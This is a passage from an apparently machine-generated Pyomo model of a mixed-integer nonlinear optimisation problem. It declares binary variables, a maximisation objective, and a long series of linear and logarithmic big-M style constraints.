m.b528 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b529 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b530 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b531 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b532 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b533 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b534 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b535 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b536 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b537 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b538 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b539 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b540 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b541 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b542 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b543 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b544 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b545 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b546 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b547 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b548 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b549 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b550 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b551 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b552 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b553 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b554 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b555 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b556 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b557 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b558 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b559 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b560 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b561 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b562 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b563 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b564 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b565 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b566 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b567 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b568 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b569 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b570 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b571 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b572 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b573 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b574 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b575 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b576 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b577 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b578 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b579 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b580 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b581 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b582 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b583 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b584 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b585 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b586 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b587 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b588 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b589 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b590 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b591 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b592 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b593 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b594 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b595 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b596 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b597 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b598 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b599 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b600 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b601 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b602 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b603 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b604 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b605 = Var(within=Binary,bounds=(0,1),initialize=0)
m.obj = Objective(expr= - m.x62 - m.x63 - m.x64 - m.x65 + 5*m.x86 + 10*m.x87 + 5*m.x88 + 10*m.x89 - 2*m.x106 - m.x107
- 2*m.x108 - m.x109 + 500*m.x158 + 600*m.x159 + 350*m.x160 + 400*m.x161 + 350*m.x162
+ 400*m.x163 + 450*m.x164 + 400*m.x165 - 10*m.x174 - 5*m.x175 - 5*m.x176 - 10*m.x177 - 5*m.x178
- 5*m.x179 - 5*m.x180 - 10*m.x181 + 180*m.x206 + 130*m.x207 + 215*m.x208 + 210*m.x209
+ 110*m.x210 + 120*m.x211 + 125*m.x212 + 130*m.x213 + 110*m.x214 + 130*m.x215 + 140*m.x216
+ 140*m.x217 + 280*m.x218 + 290*m.x219 + 220*m.x220 + 200*m.x221 - 5*m.b546 - 4*m.b547
- 6*m.b548 - 3*m.b549 - 8*m.b550 - 7*m.b551 - 6*m.b552 - 5*m.b553 - 6*m.b554 - 9*m.b555
- 4*m.b556 - 3*m.b557 - 10*m.b558 - 9*m.b559 - 5*m.b560 - 6*m.b561 - 6*m.b562 - 10*m.b563
- 6*m.b564 - 9*m.b565 - 7*m.b566 - 7*m.b567 - 4*m.b568 - 2*m.b569 - 4*m.b570 - 3*m.b571
- 2*m.b572 - 8*m.b573 - 5*m.b574 - 6*m.b575 - 7*m.b576 - 4*m.b577 - 2*m.b578 - 5*m.b579
- 2*m.b580 - 6*m.b581 - 4*m.b582 - 7*m.b583 - 4*m.b584 - 7*m.b585 - 3*m.b586 - 9*m.b587
- 3*m.b588 - 6*m.b589 - 7*m.b590 - 2*m.b591 - 9*m.b592 - 6*m.b593 - 3*m.b594 - m.b595 - 9*m.b596
- 10*m.b597 - 2*m.b598 - 6*m.b599 - 3*m.b600 - 7*m.b601 - 4*m.b602 - 8*m.b603 - m.b604
- 4*m.b605, sense=maximize)
m.c2 = Constraint(expr= m.x62 - m.x66 - m.x70 == 0)
m.c3 = Constraint(expr= m.x63 - m.x67 - m.x71 == 0)
m.c4 = Constraint(expr= m.x64 - m.x68 - m.x72 == 0)
m.c5 = Constraint(expr= m.x65 - m.x69 - m.x73 == 0)
m.c6 = Constraint(expr= - m.x74 - m.x78 + m.x82 == 0)
m.c7 = Constraint(expr= - m.x75 - m.x79 + m.x83 == 0)
m.c8 = Constraint(expr= - m.x76 - m.x80 + m.x84 == 0)
m.c9 = Constraint(expr= - m.x77 - m.x81 + m.x85 == 0)
m.c10 = Constraint(expr= m.x82 - m.x86 - m.x90 == 0)
m.c11 = Constraint(expr= m.x83 - m.x87 - m.x91 == 0)
m.c12 = Constraint(expr= m.x84 - m.x88 - m.x92 == 0)
m.c13 = Constraint(expr= m.x85 - m.x89 - m.x93 == 0)
m.c14 = Constraint(expr= m.x90 - m.x94 - m.x98 - m.x102 == 0)
m.c15 = Constraint(expr= m.x91 - m.x95 - m.x99 - m.x103 == 0)
m.c16 = Constraint(expr= m.x92 - m.x96 - m.x100 - m.x104 == 0)
m.c17 = Constraint(expr= m.x93 - m.x97 - m.x101 - m.x105 == 0)
m.c18 = Constraint(expr= m.x110 - m.x122 - m.x126 == 0)
m.c19 = Constraint(expr= m.x111 - m.x123 - m.x127 == 0)
m.c20 = Constraint(expr= m.x112 - m.x124 - m.x128 == 0)
m.c21 = Constraint(expr= m.x113 - m.x125 - m.x129 == 0)
m.c22 = Constraint(expr= m.x118 - m.x130 - m.x134 - m.x138 == 0)
m.c23 = Constraint(expr= m.x119 - m.x131 - m.x135 - m.x139 == 0)
m.c24 = Constraint(expr= m.x120 - m.x132 - m.x136 - m.x140 == 0)
m.c25 = Constraint(expr= m.x121 - m.x133 - m.x137 - m.x141 == 0)
m.c26 = Constraint(expr= m.x150 - m.x166 - m.x170 == 0)
m.c27 = Constraint(expr= m.x151 - m.x167 - m.x171 == 0)
m.c28 = Constraint(expr= m.x152 - m.x168 - m.x172 == 0)
m.c29 = Constraint(expr= m.x153 - m.x169 - m.x173 == 0)
m.c30 = Constraint(expr= - m.x154 - m.x178 + m.x182 == 0)
m.c31 = Constraint(expr= - m.x155 - m.x179 + m.x183 == 0)
m.c32 = Constraint(expr= - m.x156 - m.x180 + m.x184 == 0)
m.c33 = Constraint(expr= - m.x157 - m.x181 + m.x185 == 0)
m.c34 = Constraint(expr= m.x158 - m.x186 - m.x190 == 0)
m.c35 = Constraint(expr= m.x159 - m.x187 - m.x191 == 0)
m.c36 = Constraint(expr= m.x160 - m.x188 - m.x192 == 0)
m.c37 = Constraint(expr= m.x161 - m.x189 - m.x193 == 0)
m.c38 = Constraint(expr= m.x162 - m.x194 - m.x198 - m.x202 == 0)
m.c39 = Constraint(expr= m.x163 - m.x195 - m.x199 - m.x203 == 0)
m.c40 = Constraint(expr= m.x164 - m.x196 - m.x200 - m.x204 == 0)
m.c41 = Constraint(expr= m.x165 - m.x197 - m.x201 - m.x205 == 0)
m.c42 = Constraint(expr=(m.x238/(0.001 + 0.999*m.b486) - log(1 + m.x222/(0.001 + 0.999*m.b486)))*(0.001 + 0.999*m.b486)
<= 0)
m.c43 = Constraint(expr=(m.x239/(0.001 + 0.999*m.b487) - log(1 + m.x223/(0.001 + 0.999*m.b487)))*(0.001 + 0.999*m.b487)
<= 0)
m.c44 = Constraint(expr=(m.x240/(0.001 + 0.999*m.b488) - log(1 + m.x224/(0.001 + 0.999*m.b488)))*(0.001 + 0.999*m.b488)
<= 0)
m.c45 = Constraint(expr=(m.x241/(0.001 + 0.999*m.b489) - log(1 + m.x225/(0.001 + 0.999*m.b489)))*(0.001 + 0.999*m.b489)
<= 0)
m.c46 = Constraint(expr= m.x226 == 0)
m.c47 = Constraint(expr= m.x227 == 0)
m.c48 = Constraint(expr= m.x228 == 0)
m.c49 = Constraint(expr= m.x229 == 0)
m.c50 = Constraint(expr= m.x242 == 0)
m.c51 = Constraint(expr= m.x243 == 0)
m.c52 = Constraint(expr= m.x244 == 0)
m.c53 = Constraint(expr= m.x245 == 0)
m.c54 = Constraint(expr= m.x66 - m.x222 - m.x226 == 0)
m.c55 = Constraint(expr= m.x67 - m.x223 - m.x227 == 0)
m.c56 = Constraint(expr= m.x68 - m.x224 - m.x228 == 0)
m.c57 = Constraint(expr= m.x69 - m.x225 - m.x229 == 0)
m.c58 = Constraint(expr= m.x74 - m.x238 - m.x242 == 0)
m.c59 = Constraint(expr= m.x75 - m.x239 - m.x243 == 0)
m.c60 = Constraint(expr= m.x76 - m.x240 - m.x244 == 0)
m.c61 = Constraint(expr= m.x77 - m.x241 - m.x245 == 0)
m.c62 = Constraint(expr= m.x222 - 40*m.b486 <= 0)
m.c63 = Constraint(expr= m.x223 - 40*m.b487 <= 0)
m.c64 = Constraint(expr= m.x224 - 40*m.b488 <= 0)
m.c65 = Constraint(expr= m.x225 - 40*m.b489 <= 0)
m.c66 = Constraint(expr= m.x226 + 40*m.b486 <= 40)
m.c67 = Constraint(expr= m.x227 + 40*m.b487 <= 40)
m.c68 = Constraint(expr= m.x228 + 40*m.b488 <= 40)
m.c69 = Constraint(expr= m.x229 + 40*m.b489 <= 40)
m.c70 = Constraint(expr= m.x238 - 3.71357206670431*m.b486 <= 0)
m.c71 = Constraint(expr= m.x239 - 3.71357206670431*m.b487 <= 0)
m.c72 = Constraint(expr= m.x240 - 3.71357206670431*m.b488 <= 0)
m.c73 = Constraint(expr= m.x241 - 3.71357206670431*m.b489 <= 0)
m.c74 = Constraint(expr= m.x242 + 3.71357206670431*m.b486 <= 3.71357206670431)
m.c75 = Constraint(expr= m.x243 + 3.71357206670431*m.b487 <= 3.71357206670431)
m.c76 = Constraint(expr= m.x244 + 3.71357206670431*m.b488 <= 3.71357206670431)
m.c77 = Constraint(expr= m.x245 + 3.71357206670431*m.b489 <= 3.71357206670431)
m.c78 = Constraint(expr=(m.x246/(0.001 + 0.999*m.b490) - 1.2*log(1 + m.x230/(0.001 + 0.999*m.b490)))*(0.001 + 0.999*
m.b490) <= 0)
m.c79 = Constraint(expr=(m.x247/(0.001 + 0.999*m.b491) - 1.2*log(1 + m.x231/(0.001 + 0.999*m.b491)))*(0.001 + 0.999*
m.b491) <= 0)
m.c80 = Constraint(expr=(m.x248/(0.001 + 0.999*m.b492) - 1.2*log(1 + m.x232/(0.001 + 0.999*m.b492)))*(0.001 + 0.999*
m.b492) <= 0)
m.c81 = Constraint(expr=(m.x249/(0.001 + 0.999*m.b493) - 1.2*log(1 + m.x233/(0.001 + 0.999*m.b493)))*(0.001 + 0.999*
m.b493) <= 0)
m.c82 = Constraint(expr= m.x234 == 0)
m.c83 = Constraint(expr= m.x235 == 0)
m.c84 = Constraint(expr= m.x236 == 0)
m.c85 = Constraint(expr= m.x237 == 0)
m.c86 = Constraint(expr= m.x250 == 0)
m.c87 = Constraint(expr= m.x251 == 0)
m.c88 = Constraint(expr= m.x252 == 0)
m.c89 = Constraint(expr= m.x253 == 0)
m.c90 = Constraint(expr= m.x70 - m.x230 - m.x234 == 0)
m.c91 = Constraint(expr= m.x71 - m.x231 - m.x235 == 0)
m.c92 = Constraint(expr= m.x72 - m.x232 - m.x236 == 0)
m.c93 = Constraint(expr= m.x73 - m.x233 - m.x237 == 0)
m.c94 = Constraint(expr= m.x78 - m.x246 - m.x250 == 0)
m.c95 = Constraint(expr= m.x79 - m.x247 - m.x251 == 0)
m.c96 = Constraint(expr= m.x80 - m.x248 - m.x252 == 0)
m.c97 = Constraint(expr= m.x81 - m.x249 - m.x253 == 0)
m.c98 = Constraint(expr= m.x230 - 40*m.b490 <= 0)
m.c99 = Constraint(expr= m.x231 - 40*m.b491 <= 0)
m.c100 = Constraint(expr= m.x232 - 40*m.b492 <= 0)
m.c101 = Constraint(expr= m.x233 - 40*m.b493 <= 0)
m.c102 = Constraint(expr= m.x234 + 40*m.b490 <= 40)
m.c103 = Constraint(expr= m.x235 + 40*m.b491 <= 40)
m.c104 = Constraint(expr= m.x236 + 40*m.b492 <= 40)
m.c105 = Constraint(expr= m.x237 + 40*m.b493 <= 40)
m.c106 = Constraint(expr= m.x246 - 4.45628648004517*m.b490 <= 0)
m.c107 = Constraint(expr= m.x247 - 4.45628648004517*m.b491 <= 0)
m.c108 = Constraint(expr= m.x248 - 4.45628648004517*m.b492 <= 0)
m.c109 = Constraint(expr= m.x249 - 4.45628648004517*m.b493 <= 0)
m.c110 = Constraint(expr= m.x250 + 4.45628648004517*m.b490 <= 4.45628648004517)
m.c111 = Constraint(expr= m.x251 + 4.45628648004517*m.b491 <= 4.45628648004517)
m.c112 = Constraint(expr= m.x252 + 4.45628648004517*m.b492 <= 4.45628648004517)
m.c113 = Constraint(expr= m.x253 + 4.45628648004517*m.b493 <= 4.45628648004517)
m.c114 = Constraint(expr= - 0.75*m.x254 + m.x286 == 0)
m.c115 = Constraint(expr= - 0.75*m.x255 + m.x287 == 0)
m.c116 = Constraint(expr= - 0.75*m.x256 + m.x288 == 0)
m.c117 = Constraint(expr= - 0.75*m.x257 + m.x289 == 0)
m.c118 = Constraint(expr= m.x258 == 0)
m.c119 = Constraint(expr= m.x259 == 0)
m.c120 = Constraint(expr= m.x260 == 0)
m.c121 = Constraint(expr= m.x261 == 0)
m.c122 = Constraint(expr= m.x290 == 0)
m.c123 = Constraint(expr= m.x291 == 0)
m.c124 = Constraint(expr= m.x292 == 0)
m.c125 = Constraint(expr= m.x293 == 0)
m.c126 = Constraint(expr= m.x94 - m.x254 - m.x258 == 0)
m.c127 = Constraint(expr= m.x95 - m.x255 - m.x259 == 0)
m.c128 = Constraint(expr= m.x96 - m.x256 - m.x260 == 0)
m.c129 = Constraint(expr= m.x97 - m.x257 - m.x261 == 0)
m.c130 = Constraint(expr= m.x110 - m.x286 - m.x290 == 0)
m.c131 = Constraint(expr= m.x111 - m.x287 - m.x291 == 0)
m.c132 = Constraint(expr= m.x112 - m.x288 - m.x292 == 0)
m.c133 = Constraint(expr= m.x113 - m.x289 - m.x293 == 0)
m.c134 = Constraint(expr= m.x254 - 4.45628648004517*m.b494 <= 0)
m.c135 = Constraint(expr= m.x255 - 4.45628648004517*m.b495 <= 0)
m.c136 = Constraint(expr= m.x256 - 4.45628648004517*m.b496 <= 0)
m.c137 = Constraint(expr= m.x257 - 4.45628648004517*m.b497 <= 0)
m.c138 = Constraint(expr= m.x258 + 4.45628648004517*m.b494 <= 4.45628648004517)
m.c139 = Constraint(expr= m.x259 + 4.45628648004517*m.b495 <= 4.45628648004517)
m.c140 = Constraint(expr= m.x260 + 4.45628648004517*m.b496 <= 4.45628648004517)
m.c141 = Constraint(expr= m.x261 + 4.45628648004517*m.b497 <= 4.45628648004517)
m.c142 = Constraint(expr= m.x286 - 3.34221486003388*m.b494 <= 0)
m.c143 = Constraint(expr= m.x287 - 3.34221486003388*m.b495 <= 0)
m.c144 = Constraint(expr= m.x288 - 3.34221486003388*m.b496 <= 0)
m.c145 = Constraint(expr= m.x289 - 3.34221486003388*m.b497 <= 0)
m.c146 = Constraint(expr= m.x290 + 3.34221486003388*m.b494 <= 3.34221486003388)
m.c147 = Constraint(expr= m.x291 + 3.34221486003388*m.b495 <= 3.34221486003388)
m.c148 = Constraint(expr= m.x292 + 3.34221486003388*m.b496 <= 3.34221486003388)
m.c149 = Constraint(expr= m.x293 + 3.34221486003388*m.b497 <= 3.34221486003388)
m.c150 = Constraint(expr=(m.x294/(0.001 + 0.999*m.b498) - 1.5*log(1 + m.x262/(0.001 + 0.999*m.b498)))*(0.001 + 0.999*
m.b498) <= 0)
m.c151 = Constraint(expr=(m.x295/(0.001 + 0.999*m.b499) - 1.5*log(1 + m.x263/(0.001 + 0.999*m.b499)))*(0.001 + 0.999*
m.b499) <= 0)
m.c152 = Constraint(expr=(m.x296/(0.001 + 0.999*m.b500) - 1.5*log(1 + m.x264/(0.001 + 0.999*m.b500)))*(0.001 + 0.999*
m.b500) <= 0)
m.c153 = Constraint(expr=(m.x297/(0.001 + 0.999*m.b501) - 1.5*log(1 + m.x265/(0.001 + 0.999*m.b501)))*(0.001 + 0.999*
m.b501) <= 0)
m.c154 = Constraint(expr= m.x266 == 0)
m.c155 = Constraint(expr= m.x267 == 0)
m.c156 = Constraint(expr= m.x268 == 0)
m.c157 = Constraint(expr= m.x269 == 0)
m.c158 = Constraint(expr= m.x302 == 0)
m.c159 = Constraint(expr= m.x303 == 0)
m.c160 = Constraint(expr= m.x304 == 0)
m.c161 = Constraint(expr= m.x305 == 0)
m.c162 = Constraint(expr= m.x98 - m.x262 - m.x266 == 0)
m.c163 = Constraint(expr= m.x99 - m.x263 - m.x267 == 0)
m.c164 = Constraint(expr= m.x100 - m.x264 - m.x268 == 0)
m.c165 = Constraint(expr= m.x101 - m.x265 - m.x269 == 0)
m.c166 = Constraint(expr= m.x114 - m.x294 - m.x302 == 0)
m.c167 = Constraint(expr= m.x115 - m.x295 - m.x303 == 0)
m.c168 = Constraint(expr= m.x116 - m.x296 - m.x304 == 0)
m.c169 = Constraint(expr= m.x117 - m.x297 - m.x305 == 0)
m.c170 = Constraint(expr= m.x262 - 4.45628648004517*m.b498 <= 0)
m.c171 = Constraint(expr= m.x263 - 4.45628648004517*m.b499 <= 0)
m.c172 = Constraint(expr= m.x264 - 4.45628648004517*m.b500 <= 0)
m.c173 = Constraint(expr= m.x265 - 4.45628648004517*m.b501 <= 0)
m.c174 = Constraint(expr= m.x266 + 4.45628648004517*m.b498 <= 4.45628648004517)
m.c175 = Constraint(expr= m.x267 + 4.45628648004517*m.b499 <= 4.45628648004517)
m.c176 = Constraint(expr= m.x268 + 4.45628648004517*m.b500 <= 4.45628648004517)
m.c177 = Constraint(expr= m.x269 + 4.45628648004517*m.b501 <= 4.45628648004517)
m.c178 = Constraint(expr= m.x294 - 2.54515263975353*m.b498 <= 0)
m.c179 = Constraint(expr= m.x295 - 2.54515263975353*m.b499 <= 0)
m.c180 = Constraint(expr= m.x296 - 2.54515263975353*m.b500 <= 0)
m.c181 = Constraint(expr= m.x297 - 2.54515263975353*m.b501 <= 0)
m.c182 = Constraint(expr= m.x302 + 2.54515263975353*m.b498 <= 2.54515263975353)
m.c183 = Constraint(expr= m.x303 + 2.54515263975353*m.b499 <= 2.54515263975353)
m.c184 = Constraint(expr= m.x304 + 2.54515263975353*m.b500 <= 2.54515263975353)
m.c185 = Constraint(expr= m.x305 + 2.54515263975353*m.b501 <= 2.54515263975353)
m.c186 = Constraint(expr= - m.x270 + m.x310 == 0)
m.c187 = Constraint(expr= - m.x271 + m.x311 == 0)
m.c188 = Constraint(expr= - m.x272 + m.x312 == 0)
m.c189 = Constraint(expr= - m.x273 + m.x313 == 0)
m.c190 = Constraint(expr= - 0.5*m.x278 + m.x310 == 0)
m.c191 = Constraint(expr= - 0.5*m.x279 + m.x311 == 0)
m.c192 = Constraint(expr= - 0.5*m.x280 + m.x312 == 0)
m.c193 = Constraint(expr= - 0.5*m.x281 + m.x313 == 0)
m.c194 = Constraint(expr= m.x274 == 0)
m.c195 = Constraint(expr= m.x275 == 0)
m.c196 = Constraint(expr= m.x276 == 0)
m.c197 = Constraint(expr= m.x277 == 0)
m.c198 = Constraint(expr= m.x282 == 0)
m.c199 = Constraint(expr= m.x283 == 0)
m.c200 = Constraint(expr= m.x284 == 0)
m.c201 = Constraint(expr= m.x285 == 0)
m.c202 = Constraint(expr= m.x314 == 0)
m.c203 = Constraint(expr= m.x315 == 0)
m.c204 = Constraint(expr= m.x316 == 0)
m.c205 = Constraint(expr= m.x317 == 0)
m.c206 = Constraint(expr= m.x102 - m.x270 - m.x274 == 0)
m.c207 = Constraint(expr= m.x103 - m.x271 - m.x275 == 0)
m.c208 = Constraint(expr= m.x104 - m.x272 - m.x276 == 0)
m.c209 = Constraint(expr= m.x105 - m.x273 - m.x277 == 0)
m.c210 = Constraint(expr= m.x106 - m.x278 - m.x282 == 0)
m.c211 = Constraint(expr= m.x107 - m.x279 - m.x283 == 0)
m.c212 = Constraint(expr= m.x108 - m.x280 - m.x284 == 0)
m.c213 = Constraint(expr= m.x109 - m.x281 - m.x285 == 0)
m.c214 = Constraint(expr= m.x118 - m.x310 - m.x314 == 0)
m.c215 = Constraint(expr= m.x119 - m.x311 - m.x315 == 0)
m.c216 = Constraint(expr= m.x120 - m.x312 - m.x316 == 0)
m.c217 = Constraint(expr= m.x121 - m.x313 - m.x317 == 0)
m.c218 = Constraint(expr= m.x270 - 4.45628648004517*m.b502 <= 0)
m.c219 = Constraint(expr= m.x271 - 4.45628648004517*m.b503 <= 0)
m.c220 = Constraint(expr= m.x272 - 4.45628648004517*m.b504 <= 0)
m.c221 = Constraint(expr= m.x273 - 4.45628648004517*m.b505 <= 0)
m.c222 = Constraint(expr= m.x274 + 4.45628648004517*m.b502 <= 4.45628648004517)
m.c223 = Constraint(expr= m.x275 + 4.45628648004517*m.b503 <= 4.45628648004517)
m.c224 = Constraint(expr= m.x276 + 4.45628648004517*m.b504 <= 4.45628648004517)
m.c225 = Constraint(expr= m.x277 + 4.45628648004517*m.b505 <= 4.45628648004517)
m.c226 = Constraint(expr= m.x278 - 30*m.b502 <= 0)
m.c227 = Constraint(expr= m.x279 - 30*m.b503 <= 0)
m.c228 = Constraint(expr= m.x280 - 30*m.b504 <= 0)
m.c229 = Constraint(expr= m.x281 - 30*m.b505 <= 0)
m.c230 = Constraint(expr= m.x282 + 30*m.b502 <= 30)
m.c231 = Constraint(expr= m.x283 + 30*m.b503 <= 30)
m.c232 = Constraint(expr= m.x284 + 30*m.b504 <= 30)
m.c233 = Constraint(expr= m.x285 + 30*m.b505 <= 30)
m.c234 = Constraint(expr= m.x310 - 15*m.b502 <= 0)
m.c235 = Constraint(expr= m.x311 - 15*m.b503 <= 0)
m.c236 = Constraint(expr= m.x312 - 15*m.b504 <= 0)
m.c237 = Constraint(expr= m.x313 - 15*m.b505 <= 0)
m.c238 = Constraint(expr= m.x314 + 15*m.b502 <= 15)
m.c239 = Constraint(expr= m.x315 + 15*m.b503 <= 15)
m.c240 = Constraint(expr= m.x316 + 15*m.b504 <= 15)
m.c241 = Constraint(expr= m.x317 + 15*m.b505 <= 15)
m.c242 = Constraint(expr=(m.x358/(0.001 + 0.999*m.b506) - 1.25*log(1 + m.x318/(0.001 + 0.999*m.b506)))*(0.001 + 0.999*
m.b506) <= 0)
m.c243 = Constraint(expr=(m.x359/(0.001 + 0.999*m.b507) - 1.25*log(1 + m.x319/(0.001 + 0.999*m.b507)))*(0.001 + 0.999*
m.b507) <= 0)
m.c244 = Constraint(expr=(m.x360/(0.001 + 0.999*m.b508) - 1.25*log(1 + m.x320/(0.001 + 0.999*m.b508)))*(0.001 + 0.999*
m.b508) <= 0)
m.c245 = Constraint(expr=(m.x361/(0.001 + 0.999*m.b509) - 1.25*log(1 + m.x321/(0.001 + 0.999*m.b509)))*(0.001 + 0.999*
m.b509) <= 0)
m.c246 = Constraint(expr= m.x322 == 0)
m.c247 = Constraint(expr= m.x323 == 0)
m.c248 = Constraint(expr= m.x324 == 0)
m.c249 = Constraint(expr= m.x325 == 0)
m.c250 = Constraint(expr= m.x366 == 0)
m.c251 = Constraint(expr= m.x367 == 0)
m.c252 = Constraint(expr= m.x368 == 0)
m.c253 = Constraint(expr= m.x369 == 0)
m.c254 = Constraint(expr= m.x122 - m.x318 - m.x322 == 0)
m.c255 = Constraint(expr= m.x123 - m.x319 - m.x323 == 0)
m.c256 = Constraint(expr= m.x124 - m.x320 - m.x324 == 0)
m.c257 = Constraint(expr= m.x125 - m.x321 - m.x325 == 0)
m.c258 = Constraint(expr= m.x142 - m.x358 - m.x366 == 0)
m.c259 = Constraint(expr= m.x143 - m.x359 - m.x367 == 0)
m.c260 = Constraint(expr= m.x144 - m.x360 - m.x368 == 0)
m.c261 = Constraint(expr= m.x145 - m.x361 - m.x369 == 0)
m.c262 = Constraint(expr= m.x318 - 3.34221486003388*m.b506 <= 0)
m.c263 = Constraint(expr= m.x319 - 3.34221486003388*m.b507 <= 0)
m.c264 = Constraint(expr= m.x320 - 3.34221486003388*m.b508 <= 0)
m.c265 = Constraint(expr= m.x321 - 3.34221486003388*m.b509 <= 0)
m.c266 = Constraint(expr= m.x322 + 3.34221486003388*m.b506 <= 3.34221486003388)
m.c267 = Constraint(expr= m.x323 + 3.34221486003388*m.b507 <= 3.34221486003388)
m.c268 = Constraint(expr= m.x324 + 3.34221486003388*m.b508 <= 3.34221486003388)
m.c269 = Constraint(expr= m.x325 + 3.34221486003388*m.b509 <= 3.34221486003388)
m.c270 = Constraint(expr= m.x358 - 1.83548069293539*m.b506 <= 0)
m.c271 = Constraint(expr= m.x359 - 1.83548069293539*m.b507 <= 0)
m.c272 = Constraint(expr= m.x360 - 1.83548069293539*m.b508 <= 0)
m.c273 = Constraint(expr= m.x361 - 1.83548069293539*m.b509 <= 0)
m.c274 = Constraint(expr= m.x366 + 1.83548069293539*m.b506 <= 1.83548069293539)
m.c275 = Constraint(expr= m.x367 + 1.83548069293539*m.b507 <= 1.83548069293539)
m.c276 = Constraint(expr= m.x368 + 1.83548069293539*m.b508 <= 1.83548069293539)
m.c277 = Constraint(expr= m.x369 + 1.83548069293539*m.b509 <= 1.83548069293539)
m.c278 = Constraint(expr=(m.x374/(0.001 + 0.999*m.b510) - 0.9*log(1 + m.x326/(0.001 + 0.999*m.b510)))*(0.001 + 0.999*
m.b510) <= 0)
m.c279 = Constraint(expr=(m.x375/(0.001 + 0.999*m.b511) - 0.9*log(1 + m.x327/(0.001 + 0.999*m.b511)))*(0.001 + 0.999*
m.b511) <= 0)
m.c280 = Constraint(expr=(m.x376/(0.001 + 0.999*m.b512) - 0.9*log(1 + m.x328/(0.001 + 0.999*m.b512)))*(0.001 + 0.999*
m.b512) <= 0)
m.c281 = Constraint(expr=(m.x377/(0.001 + 0.999*m.b513) - 0.9*log(1 + m.x329/(0.001 + 0.999*m.b513)))*(0.001 + 0.999*
m.b513) <= 0)
m.c282 = Constraint(expr= m.x330 == 0)
m.c283 = Constraint(expr= m.x331 == 0)
m.c284 = Constraint(expr= m.x332 == 0)
m.c285 = Constraint(expr= m.x333 == 0)
m.c286 = Constraint(expr= m.x382 == 0)
m.c287 = Constraint(expr= m.x383 == 0)
m.c288 = Constraint(expr= m.x384 == 0)
m.c289 = Constraint(expr= m.x385 == 0)
m.c290 = Constraint(expr= m.x126 - m.x326 - m.x330 == 0)
m.c291 = Constraint(expr= m.x127 - m.x327 - m.x331 == 0)
m.c292 = Constraint(expr= m.x128 - m.x328 - m.x332 == 0)
m.c293 = Constraint(expr= m.x129 - m.x329 - m.x333 == 0)
m.c294 = Constraint(expr= m.x146 - m.x374 - m.x382 == 0)
m.c295 = Constraint(expr= m.x147 - m.x375 - m.x383 == 0)
m.c296 = Constraint(expr= m.x148 - m.x376 - m.x384 == 0)
m.c297 = Constraint(expr= m.x149 - m.x377 - m.x385 == 0)
m.c298 = Constraint(expr= m.x326 - 3.34221486003388*m.b510 <= 0)
m.c299 = Constraint(expr= m.x327 - 3.34221486003388*m.b511 <= 0)
